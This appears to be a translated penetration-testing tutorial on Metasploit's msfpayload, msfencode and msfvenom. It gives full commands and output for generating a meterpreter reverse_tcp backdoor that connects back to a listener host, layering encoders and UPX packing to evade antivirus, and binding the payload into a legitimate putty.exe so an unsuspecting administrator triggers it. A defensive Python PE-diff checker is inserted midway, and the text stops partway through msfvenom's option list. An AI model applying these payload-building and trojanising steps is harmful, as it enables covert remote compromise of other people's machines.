Metasploit module structure and function analysis


[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************

[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[!] ************************************************************************
[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[*] x86/shikata_ga_nai succeeded with size 308 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 335 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 362 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 389 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 416 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 443 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 470 (iteration=7)
[*] x86/bloxor succeeded with size 547 (iteration=1)
[*] x86/bloxor succeeded with size 617 (iteration=2)
[*] x86/bloxor succeeded with size 677 (iteration=3)
[*] x86/countdown succeeded with size 695 (iteration=1)
[*] x86/countdown succeeded with size 713 (iteration=2)
[*] x86/countdown succeeded with size 731 (iteration=3)
[*] x86/countdown succeeded with size 749 (iteration=4)
[*] x86/countdown succeeded with size 767 (iteration=5)

This finally produces av.exe. We can check that the generated exe actually runs by copying it to a Windows host and running it; please test this yourself, I am not including a screenshot.

If it runs but you still worry that antivirus will catch it, we can pack it with UPX. Keep in mind that UPX is one of the most widely recognised packers: scanners identify its header and unpack it in memory (anyone can do the same with `upx -d`), so packing a payload that is already detected rarely hides it.

exploit@ubuntu:/pentest/framework3$ upx -5 av.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2013
UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     73802 ->     48128   65.21%    win32/pe     av.exe

Packed 1 file.

When a payload generated this way runs, nothing visible happens. That is fine when the penetration tester launches it personally, but sometimes we need the administrator or another user of the target host to trigger the payload for us, so we need a more covert trigger. In official terms: build the payload file on a standard file template. In plain terms: a binder. Bundle our shellcode with a legitimate program so that when the administrator runs the legitimate program, our payload backdoor is triggered.

a.exe is a legitimate putty binary; we bind the shellcode into it to produce a new program:

exploit@ubuntu:/pentest/framework3$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -k -x /pentest/framework3/a.exe -o putty.exe
[*] x86/shikata_ga_nai succeeded with size 308 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 335 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 362 (iteration=3)

This gives us a new putty.exe; simply replace the original putty.exe with it, and when the administrator runs the modified putty.exe our backdoor is triggered. The `-k` option is what keeps the template usable: putty still starts normally while the payload runs in a new thread. Without `-k` the template only lends the file its appearance (icon, version information and so on) and the original program does not run.

As mentioned earlier, we may also want to apply evasion to a server binary we already have, for example one produced by another trojan generator, and the same pattern can be used. In the example below, a.exe is the original putty file and payload.exe is the trojan server we generated; binding the two is meant to produce a new putty.exe. Note that `-x` takes the template path as its argument and `-k` takes none, so the two must be written as `-k -x <template>`. One more caveat: msfencode treats the `-i` input as raw shellcode and does not unpack a PE file. A complete .exe passed this way is encoded byte for byte, headers included, and the result is not valid shellcode, so this step only produces a working binary when the input is genuine position-independent shellcode, such as the raw (`R`) output of msfpayload.

exploit@ubuntu:/pentest/framework3$ msfencode -i /pentest/framework3/payload.exe -e x86/shikata_ga_nai -c 5 -k -x /pentest/framework3/a.exe -o putty.exe
[*] x86/shikata_ga_nai succeeded with size 73831 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 73860 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 73889 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 73918 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 73947 (iteration=5)
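To turn the binding step into something a defender can check, here is an added example (my own code, not from the original post and not part of Metasploit) that compares a trusted copy of a program with a suspect copy and reports what a `-k -x template` injection leaves behind: the template's own sections unchanged, a new executable section holding the payload stub, and an entry point that no longer lies in the original code section. The two PE images, the section name `.inject` and the stub bytes are constructed for the demo; the real section name and layout produced by msfencode/msfvenom are not given on this page and are not assumed here. The same check applies to both bound putty.exe variants above.

```python
import struct

# Section Characteristics flags from the PE specification.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
SCN_CODE_RX = 0x60000020   # CNT_CODE | MEM_EXECUTE | MEM_READ
SCN_DATA_R = 0x40000040    # CNT_INITIALIZED_DATA | MEM_READ


def parse_pe(data):
    """Return (AddressOfEntryPoint, section table) of a PE32/PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF file header: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    opt_off = pe_off + 24
    entry_rva = struct.unpack_from("<I", data, opt_off + 16)[0]  # AddressOfEntryPoint
    sections = []
    for i in range(nsections):
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt_off + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": f[1], "vaddr": f[2], "rsize": f[3],
                         "raw_off": f[4], "flags": f[9]})
    return entry_rva, sections


def section_for(sections, rva):
    """Name of the section that contains `rva`, or None."""
    for s in sections:
        if s["vaddr"] <= rva < s["vaddr"] + max(s["vsize"], s["rsize"]):
            return s["name"]
    return None


def compare_pe(original, suspect):
    """Findings that indicate code was injected into a copy of `original`."""
    o_entry, o_secs = parse_pe(original)
    s_entry, s_secs = parse_pe(suspect)
    findings = []
    o_by_name = {s["name"]: s for s in o_secs}
    for s in s_secs:
        if s["name"] not in o_by_name:
            kind = "executable" if s["flags"] & IMAGE_SCN_MEM_EXECUTE else "data"
            findings.append(f"new {kind} section {s['name']!r} at RVA {s['vaddr']:#x}")
        else:
            o = o_by_name[s["name"]]
            if original[o["raw_off"]:o["raw_off"] + o["rsize"]] != suspect[s["raw_off"]:s["raw_off"] + s["rsize"]]:
                findings.append(f"section {s['name']!r} contents differ")
    if s_entry != o_entry:
        findings.append(f"entry point moved {o_entry:#x} -> {s_entry:#x}, "
                        f"now in section {section_for(s_secs, s_entry)!r}")
    return findings


def build_pe(sections, entry_rva):
    """Construct a minimal PE32 image for the demo: (name, RVA, bytes, flags) per section."""
    hdr_size, align = 0x400, 0x200
    raw, hdrs = b"", []
    for name, vaddr, data, flags in sections:
        padded = data + b"\0" * (-len(data) % align)
        hdrs.append(struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(data),
                                vaddr, len(padded), hdr_size + len(raw), 0, 0, 0, 0, flags))
        raw += padded
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x80)).ljust(0x80, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = struct.pack("<HBBIIIIII", 0x10B, 0, 0, 0, 0, 0, entry_rva, 0, 0).ljust(224, b"\0")
    return (dos + b"PE\0\0" + coff + opt + b"".join(hdrs)).ljust(hdr_size, b"\0") + raw


# Constructed stand-ins: CLEAN plays the role of the untouched a.exe, INJECTED the
# putty.exe produced with "-k -x a.exe". The section name ".inject" and the stub
# bytes are made up for the demo; real msfencode/msfvenom output differs.
CODE = bytes.fromhex("5589e5b8010000005dc3")   # push ebp; mov ebp,esp; mov eax,1; pop ebp; ret
CLEAN = build_pe([(".text", 0x1000, CODE, SCN_CODE_RX),
                  (".rdata", 0x2000, b"PuTTY", SCN_DATA_R)], entry_rva=0x1000)
INJECTED = build_pe([(".text", 0x1000, CODE, SCN_CODE_RX),
                     (".rdata", 0x2000, b"PuTTY", SCN_DATA_R),
                     (".inject", 0x3000, b"\x90" * 27 + b"\xcc", SCN_CODE_RX)], entry_rva=0x3000)

if __name__ == "__main__":
    for line in compare_pe(CLEAN, INJECTED):
        print(line)
```

A hash comparison against the vendor's published checksum is enough to tell that putty.exe was replaced; the section diff tells how. On a real host, read both files with `open(path, "rb").read()` and pass them to `compare_pe`; a copy that differs only in its entry point and gains one executable section is the signature of a template injection, whereas a legitimately updated build will also change the existing `.text` contents and version resources.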

Next, msfvenom. msfvenom combines the functions of msfencode and msfpayload and is gradually replacing both: the payload and its options go to `-p`, the encoder to `-e`, the iteration count to `-i` (msfencode's `-c`), the output format to `-f` (msfencode's `-t`), and `-x` / `-k` keep their meaning. Let's look at the options first:

exploit@ubuntu:/pentest/framework3$ msfvenom -h
Usage: /usr/local/bin/msfvenom [options]

Options:
    -p, --payload    [payload]       Payload to use. Specify a '-' or stdin to use custom payloads
    -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all
    -n, --nopsled    [length]        Prepend a nopsled of [length] size on to the payload
    -f, --format     [format]        Output format (use --help-formats for a list)
    -e, --encoder    [encoder]       The encoder to use
    -a, --arch       [architecture]  The architecture to use
        --platform   [platform]      The platform of the payload
    -s, --space      [length]        The maximum size of the resulting payload
    -b, --bad-chars  [list]          The list of characters to avoid example: '\x00\xff'
    -i, --iterations [count]         The number of times to encode the payload
    -c, --add-code   [path]          Specify an additional win32 shellcode file to include
    -x, --template   [path]          Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
        --payload-options            List the payload's standard options
    -o, --out        [path]          Save the payload
    -v, --var-name   [name]          Specify a custom variable name to use for certain output formats
    -h, --help                       Show this message
        --help-formats               List available formats

Here we go through the msfvenom parameters one by one:

-p, --payload: which payload to generate

-l, --list: list modules of a given type: payloads, encoders, nops, all

-n, --nopsled
